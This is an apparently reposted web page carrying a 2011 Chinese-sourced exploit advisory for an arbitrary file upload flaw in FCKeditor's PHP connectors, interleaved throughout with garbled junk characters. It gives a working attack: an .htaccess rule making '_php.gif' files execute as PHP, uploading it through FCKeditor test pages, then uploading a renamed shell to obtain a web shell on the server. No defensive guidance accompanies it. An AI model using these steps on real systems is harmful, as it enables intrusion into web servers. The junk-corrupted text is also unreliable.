FCKeditor所有php版本Upload上传漏洞
/ o4 S" E# ]" V: S/ J! M作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
% |6 S3 A+ n5 d1 B4 }" x% K减小字体 增大字体
9 Q& U9 F8 ]3 n- x- w# W[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability) Y& P9 }; g" r$ g% H
[+] Date: 2011
- z- S8 R& k8 D1 D[+] Author : sinesafe.cn
. r/ L3 ?1 B x8 F[+] Website : WwW.sinesafe.cn7 K2 i. \3 A: y" g; a7 n. a
———————————————————
" f; v* |% D2 [0 i. L1 K1.create a htaccess file:% O0 T v @% z" T
code:
' V: b8 [1 z- C<FilesMatch “_php.gif”>7 W1 o; \* W1 q4 z
SetHandler application/x-httpd-php
5 W/ _% \7 D; _</FilesMatch>8 J% ]' w# \7 E% t3 V# u3 h
7 x/ e8 C5 z+ C x; v0 S2.Now upload this htaccess with FCKeditor.
; x0 h; ~* N. W) Y- l. h- q
}$ F4 t! k! e7 c& fhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html0 N5 g. y+ H; G2 X. b }
! m; ~1 F; |$ |+ Q! E' W% X! R0 Xhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html$ h& h7 {( W& h7 w- ?/ h; r
9 r; m2 H$ f" s% ~7 {5 W; A3 }5 v
———————————————————————————————-
c: H+ ^9 t/ U3.Now upload shell.php.gif with FCKeditor.# b) ~/ J" E/ P" K
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
- ?% }; W: f6 \+ Z4 h/ _& |5.http://www.sinesafe.cn/anything/shell_php.gif
1 Z' t+ K* h9 j. m l3 S; M! ^( g6.Now shell is available from server. |
5 n' K5 Y/ P) O& J Y1 P B |
4 n4 |* d8 f/ g$ x4 a0 ?8 }: h" `( |9 h7 d ~3 ~ h
|
发表于 2013-10-27 17:25:21
收藏
支持
反对